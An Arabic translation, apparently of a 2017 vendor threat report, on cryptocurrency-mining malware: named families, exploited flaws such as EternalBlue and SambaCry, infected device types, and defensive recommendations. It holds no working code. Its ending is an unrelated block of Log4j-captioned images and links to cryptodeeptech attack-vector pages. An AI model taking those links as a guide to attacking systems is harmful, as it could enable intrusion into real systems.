## البيتكوين ليس كل شيء

في الواقع هناك أكثر من 700 عملة رقمية، لكن القليل منها فقط يتم تداوله بسهولة وحتى أقل منها قيمتها السوقية تتجاوز 100 مليون دولار. البيتكوين، على سبيل المثال، تم إنشاؤه بواسطة ساتوشي ناكاموتو (اسم مستعار) وتم إصداره في عام 2009 ككود مفتوح المصدر. تقنية سلسلة الكتل جعلت كل شيء يعمل، بتوفير نظام حيث يتم بث هياكل البيانات (الكتل) والتحقق منها وتسجيلها في قاعدة بيانات عامة موزعة من خلال شبكة من نقاط الاتصال (العقد).

بينما البيتكوين هو العملة الرقمية الأكثر شهرة، هناك بدائل شائعة أخرى. أخذت إيثريوم "العقود الذكية" إلى مستوى أعلى من خلال جعل لغات البرمجة اللازمة لكتابتها أكثر سهولة للمطورين. تُكتب الاتفاقيات، أو المعاملات الشرطية (إذا-ثم)، ككود ويتم تنفيذها (طالما تم استيفاء المتطلبات) في سلسلة كتل إيثريوم.

ومع ذلك، اكتسبت إيثريوم سمعة سيئة بعد أن استغل هاكر ثغرة في المنظمة المستقلة الرقمية (DAO) التي تعمل على برمجية إيثريوم، مستنزفًا 50 مليون دولار أمريكي من عملة الإيثر (عملة إيثريوم). أدى هذا إلى تطوير إيثريوم كلاسيك، المستندة إلى سلسلة الكتل الأصلية، وإيثريوم، نسختها المطورة (من خلال شوكة صلبة).

هناك أيضًا عملات رقمية ملحوظة أخرى: لايتكوين، دوجكوين، مونيرو. لايتكوين هو تحسين تقني مفترض للبيتكوين قادر على توفير معاملات أسرع من خلال خوارزمية التعدين Scrypt (يستخدم البيتكوين SHA-256). شبكة لايتكوين قادرة على إنتاج 84 مليون لايتكوين - أربعة أضعاف عدد وحدات العملة الرقمية التي يصدرها البيتكوين. تتميز مونيرو باستخدامها للتوقيعات الحلقية (نوع من التوقيع الرقمي) وبروتوكول طبقة التطبيق CryptoNote لحماية خصوصية معاملاتها - المبلغ والمصدر والوجهة. دوجكوين، التي تم تطويرها في البداية للأغراض التعليمية أو الترفيهية، كانت موجهة لفئة ديموغرافية أوسع. قادرة على توليد دوجكوين غير محدود، تستخدم أيضًا Scrypt لدفع العملة.

## تعدين العملات الرقمية جذب أيضًا انتباه المجرمين الإلكترونيين

العملات الرقمية ليس لها حدود - يمكن لأي شخص إرسالها في أي وقت وفي أي مكان، دون تأخير أو رسوم إضافية/مخفية من الوسطاء. نظرًا لطبيعتها، فهي أكثر أمانًا من الاحتيال وسرقة الهوية حيث لا يمكن تزوير العملات الرقمية، والمعلومات الشخصية تكون خلف جدار تشفير.

لسوء الحظ، فإن نفس الربحية الظاهرة والراحة وإخفاء الهوية للعملات الرقمية جعلتها مثالية للمجرمين الإلكترونيين، كما أظهر مشغلو برمجيات الفدية. تزامن الشعبية المتزايدة للعملات الرقمية مع وقوع برمجيات خبيثة تصيب الأنظمة والأجهزة، وتحولها إلى جيوش من آلات تعدين العملات الرقمية.

تعدين العملات الرقمية هو مهمة مكثفة حسابيًا تتطلب موارد كبيرة من معالجات مخصصة وبطاقات رسوم وأجهزة أخرى. بينما يولد التعدين أموالًا، هناك العديد من المحاذير. الربح نسبي لاستثمار المعدن في الأجهزة، ناهيك عن تكاليف الكهرباء لتشغيلها.

يتم تعدين العملات الرقمية في كتل؛ في البيتكوين، على سبيل المثال، في كل مرة يتم حل عدد معين من التجزئات (hashes)، يتم خفض عدد البيتكوينات التي يمكن منحها للمعدن لكل كتلة إلى النصف. نظرًا لأن شبكة البيتكوين مصممة لتوليد العملة الرقمية كل 10 دقائق، يتم تعديل صعوبة حل تجزئة أخرى. ومع زيادة قوة التعدين، تتراكم متطلبات الموارد لتعدين كتلة جديدة. المدفوعات صغيرة نسبيًا وتنخفض في النهاية كل أربع سنوات - في عام 2016، كانت مكافأة تعدين كتلة نصف إلى 12.5 بيتكوين (أو 32,000 دولار اعتبارًا من 5 يوليو 2017). وبالتالي، ينضم العديد في مجموعات لجعل التعدين أكثر كفاءة. يتم تقسيم الربح بين المجموعة، اعتمادًا على مقدار الجهد الذي بذله المعدن.

## برمجيات تعدين العملات الرقمية الخبيثة تستخدم نواقل هجوم مماثلة

يلجأ الأشرار إلى استخدام برمجيات خبيثة للتحايل على هذه التحديات. هناك، مع ذلك، محاذير لعمال مناجم العملات الرقمية المجرمين: الأجهزة والآلات المتصلة بالإنترنت، على الرغم من سرعتها الكافية لمعالجة بيانات الشبكة، لا تملك قدرات معالجة أعداد ضخمة. لتعويض ذلك، تم تصميم برمجيات تعدين العملات الرقمية الخبيثة لجعل البوتنات لأجهزة الكمبيوتر تقوم بهذه المهام. آخرون تجنبوا التعتيم تمامًا - في عام 2014، تم استخدام مجموعة الحواسيب الفائقة Odyssey في جامعة هارفارد لتعدين الدوجكوين بشكل غير مشروع. خلال نفس العام، حدث حادث مماثل لحواسيب وكالة العلوم الوطنية الأمريكية الفائقة. في أوائل فبراير 2017، تم إساءة استخدام أحد خوادم الاحتياطي الفيدرالي الأمريكي لتعدين البيتكوين.

تستخدم برمجيات تعدين العملات الرقمية الخبيثة نفس أسلوب العمل مثل العديد من التهديدات الأخرى - بدءًا من رسائل البريد الإلكتروني المزودة ببرمجيات خبيثة والتنزيلات من عناوين URL خبيثة إلى البرامج غير المرغوب فيها والتطبيقات غير المرغوب فيها المحتملة (PUAs). في يناير 2014، تم اختراق ثغرة في شبكة إعلانات ياهو المبنية على جافا، مما عرض المستخدمين النهائيين الأوروبيين لـ إعلانات خبيثة التي سلمت برمجية تعدين البيتكوين الخبيثة. قبل شهر من ذلك، اعتقلت سلطات القانون الألمانية قراصنة لاستخدامهم برمجيات خبيثة لتعدين ما قيمته أكثر من 954,000 دولار من البيتكوين.

لقد رأينا ظهور أدوات الاختراق والأبواب الخلفية المتعلقة بتعدين البيتكوين الإجرامي مبكرًا في عام 2011، ومنذ ذلك الحين رأينا مجموعة متنوعة من تهديدات تعدين العملات الرقمية التي تضيف قدرات إضافية، مثل رفض الخدمة الموزع و انتحال عناوين URL. آخر حاول التنكر كمكون لأحد منتجات Trend Micro. في عام 2014، عبر التهديد إلى أجهزة Android باسم Kagecoin، القادر على تعدين البيتكوين واللايتكوين والدوجكوين. تم تعديل حصان طروادة للتحكم عن بعد (RAT) njrat/Njw0rm الذي تم مشاركته في السوق السرية في الشرق الأوسط لإضافة وظيفة تعدين البيتكوين. نفس الشيء تم مع Java RAT قديم يمكنه تعدين اللايتكوين.

من أبرز برمجيات تعدين العملات الرقمية الخبيثة هذا العام حتى الآن هي Adylkuzz وCPUMiner/EternalMiner وLinux.MulDrop.14. جميعها تستغل ثغرات. تستغل Adylkuzz ثغرة EternalBlue، نفس الخلل الأمني الذي استخدمته برمجية الفدية WannaCry بشكل مدمر، بينما استخدم CPUMiner/EternalMiner SambaCry، وهي ثغرة في مجموعة برمجيات التشغيل البيني Samba. Linux.MulDrop.14، وهو حصان طروادة لنظام لينكس، يستهدف أجهزة Raspberry Pi. هذه التهديدات أصابت الأجهزة والآلات وحولتها إلى بوتنات لتعدين مونيرو.

## تأثير برمجيات تعدين العملات الرقمية الخبيثة يجعلها تهديدًا موثوقًا

تسرق برمجيات تعدين العملات الرقمية الخبيثة موارد الأجهزة المصابة، مما يؤثر بشكل كبير على أدائها ويزيد من تآكلها. تتضمن العدوى أيضًا تكاليف أخرى، مثل زيادة استهلاك الطاقة.

لكننا وجدنا أيضًا أن تأثيرها يتجاوز مشكلات الأداء. من 1 يناير إلى 24 يونيو 2017، اكتشفت أجهزة الاستشعار لدينا 4,894 معدّن بيتكوين أطلقوا أكثر من 460,259 نشاط تعدين بيتكوين، ووجدنا أن أكثر من 20% من هؤلاء المعدنين أطلقوا أيضًا هجمات على الويب والشبكة. حتى أننا وجدنا محاولات اقتحام مرتبطة بناقل هجوم لبرمجية فدية. كانت أكثر هذه الهجمات انتشارًا التي رأيناها هي:

  * البرمجة النصية عبر المواقع (XSS)
  * استغلال ثغرة تنفيذ كود عن بعد في خادم معلومات الإنترنت من مايكروسوفت (IIS)
  * هجمات القوة العمياء وتسجيلات الدخول/هجمات كلمة المرور الافتراضية
  * استغلال تجاوز سعة المخزن المؤقت للأوامر
  * حقن كود PHP تعسفي
  * حقن SQL
  * هجوم رفض الخدمة BlackNurse



يمكن لهذه البرمجيات الخبيثة تهديد توفر وسلامة وأمن الشبكة أو النظام، مما قد يؤدي إلى تعطيل العمليات الحيوية للمؤسسة. سرقة المعلومات واختطاف النظام هي أيضًا عواقب شاقة. يمكن أن تكون هذه الهجمات أيضًا القناة التي يتم من خلالها تسليم برمجيات خبيثة إضافية.

أجهزة إنترنت الأشياء (IoT) هي أيضًا في مرمى نيران برمجيات تعدين العملات الرقمية الخبيثة - بدءًا من مسجلات الفيديو الرقمية (DVRs)/كاميرات المراقبة، وأجهزة الفك العلوي (set-top boxes)، وأجهزة التخزين المتصل بالشبكة (NAS)، وخاصة أجهزة التوجيه (routers) نظرًا لانتشارها في البيئات المنزلية والمؤسسية. في أبريل 2017، ظهر متغير من Mirai مع قدرات تعدين البيتكوين. اشتهر Mirai من الفوضى التي أحدثها في أجهزة IoT، وخاصة أجهزة التوجيه المنزلية، مستخدمًا إياها لإسقاط مواقع بارزة عن العمل في العام الماضي. خلال الأرباع الثلاثة الأولى من عام 2016، اكتشفنا جيش زومبي لتعدين البيتكوين يتكون من أنظمة ويندوز وأجهزة توجيه منزلية وكاميرات IP.

من 1 يناير إلى 24 يونيو 2017، لاحظنا أيضًا أنواعًا مختلفة من الأجهزة التي كانت تقوم بتعدين البيتكوين، على الرغم من أن بيانات القياس عن بعد لدينا لا تستطيع التحقق مما إذا كانت هذه الأنشطة مصرحًا بها. كما رأينا أنشطة تعدين البيتكوين ترتفع بنسبة 40% من 1,800 حدث يوميًا في فبراير إلى 3,000 في مارس 2017.

بينما تعدين البيتكوين ليس غير قانوني بطبيعته (على الأقل في العديد من البلدان)، يمكن أن يستلزم اختراقًا إذا لم يكن بمعرفة وموافقة المالك. وجدنا أن الأجهزة التي تعمل بنظام ويندوز كانت لديها معظم أنشطة تعدين البيتكوين، ولكن أيضًا جدير بالذكر:

  * الأنظمة على أنظمة تشغيل Macintosh، بما في ذلك iOS (iPhone 4 إلى iPhone 7)
  * الأجهزة التي تعمل بنظام Ubuntu OS، المشتق من نظام التشغيل Debian Linux
  * أجهزة التوجيه المنزلية
  * أجهزة مراقبة البيئة، المستخدمة في مراكز البيانات
  * أجهزة التلفاز الذكية التي تعمل بنظام Android والأجهزة المحمولة
  * كاميرات IP
  * خوادم الطباعة
  * مشغلات الألعاب



**[اقرأ:****كيفية تأمين جهاز التوجيه الخاص بك ضد هجمات Mirai وهجمات الشبكة المنزلية****]**

## برمجيات تعدين العملات الرقمية الخبيثة يمكن أن تجعل الضحايا جزءًا من المشكلة

يمكن لبرمجيات تعدين العملات الرقمية الخبيثة إضعاف أداء النظام وتعريض المستخدمين النهائيين والشركات لسرقة المعلومات والاختطاف ومجموعة من البرمجيات الخبيثة الأخرى. ومن خلال تحويل هذه الأجهزة إلى زومبي، يمكن لبرمجيات العملات الرقمية الخبيثة أن تجعل ضحاياها جزءًا من المشكلة دون قصد.

في الواقع، تأثيرها السلبي على الأجهزة التي تصيبها - وفي النهاية أصول الأعمال أو بيانات المستخدم - يجعلها تهديدًا موثوقًا. لا يوجد حل سحري لهذه البرمجيات الخبيثة، ولكن يمكن التخفيف منها باتباع أفضل الممارسات التالية:

  * يساعد تحديث جهازك بانتظام بأحدث التصحيحات في منع المهاجمين من استخدام الثغرات كبوابات للدخول إلى الأنظمة
  * تغيير أو تقوية بيانات الاعتماد الافتراضية للجهاز يجعله أقل عرضة للوصول غير المصرح به
  * تمكين جدار الحماية للجهاز (لأجهزة التوجيه المنزلية) إن وجد، أو نشر أنظمة كشف ومنع الاختراقات للتخفيف من محاولات الاختراق
  * الحذر من نواقل الهجوم المعروفة: الروابط المهندسة اجتماعيًا، المرفقات أو الملفات من المواقع المشبوهة، البرامج/التطبيقات المشبوهة من أطراف ثالثة، والبريد الإلكتروني غير المرغوب فيه 



يمكن لمسؤولي تكنولوجيا المعلومات/الأنظمة ومحترفي أمن المعلومات أيضًا النظر في القائمة البيضاء للتطبيقات أو آليات الأمان المماثلة التي تمنع تشغيل أو تثبيت البرامج القابلة للتنفيذ المشبوهة. تساعد مراقبة حركة مرور الشبكة بشكل استباقي في تحديد العلامات الحمراء التي قد تشير إلى الإصابة بالبرامج الضارة. إن تطبيق مبدأ الامتياز الأقل، وتطوير إجراءات مضادة ضد حقن الويب، وتأمين بوابة البريد الإلكتروني، وتنفيذ أفضل الممارسات للأجهزة المحمولة للشركات، وتنمية قوة عاملة واعية بأمن المعلومات هي جزء من نهج الدفاع المتعمق لتقليل تعرض المؤسسة لهذه التهديدات. ولكن في النهاية، فإن أمان الأجهزة المتصلة بالإنترنت ضد برامج تعدين العملات المشفرة الضارة ليس عبئًا على مستخدميها فحسب. يلعب مصنعو التصميم الأصلي ومصنعو المعدات أيضًا أدوارًا حيوية في تأمين النظم البيئية التي تعمل فيها.

![استغلال في كود تعدين العملات المشفرة استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/e784aa39a828189e3b8a873d0475cb3a35296593d493d8b35780f825e8e5bae7.png)`https://cryptodeeptech.ru/blockchain-attack-vectors/`

* * *

## الأغلبية لا تكفي: تعدين البيتكوين معرض للخطر

![استغلال في كود تعدين العملات المشفرة استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/c291660b1fa93dcf3f1d29aecfd481aa9693071941038b3a69383b07ddacf712.png)`https://cryptodeep.ru/doc/Majority_is_not_Enough_Bitcoin_Mining_is_Vulnerable.pdf`

* * *

**GitHub**

**تيليجرام: https://t.me/cryptodeeptech**

**فيديو: https://youtu.be/PNDBjoT83zA**

**المصدر: https://cryptodeeptech.ru/log4j-vulnerability**

* * *

![استغلال في كود تعدين العملات المشفرة استخدم ثغرة Log4j الخطيرة](https://assets.kitploit.com/production/public/readmes/24600/646c8de5f568a491e55291aab50f4d260a1aac69b8556099dc6893e51a5d79c9.png)

* * *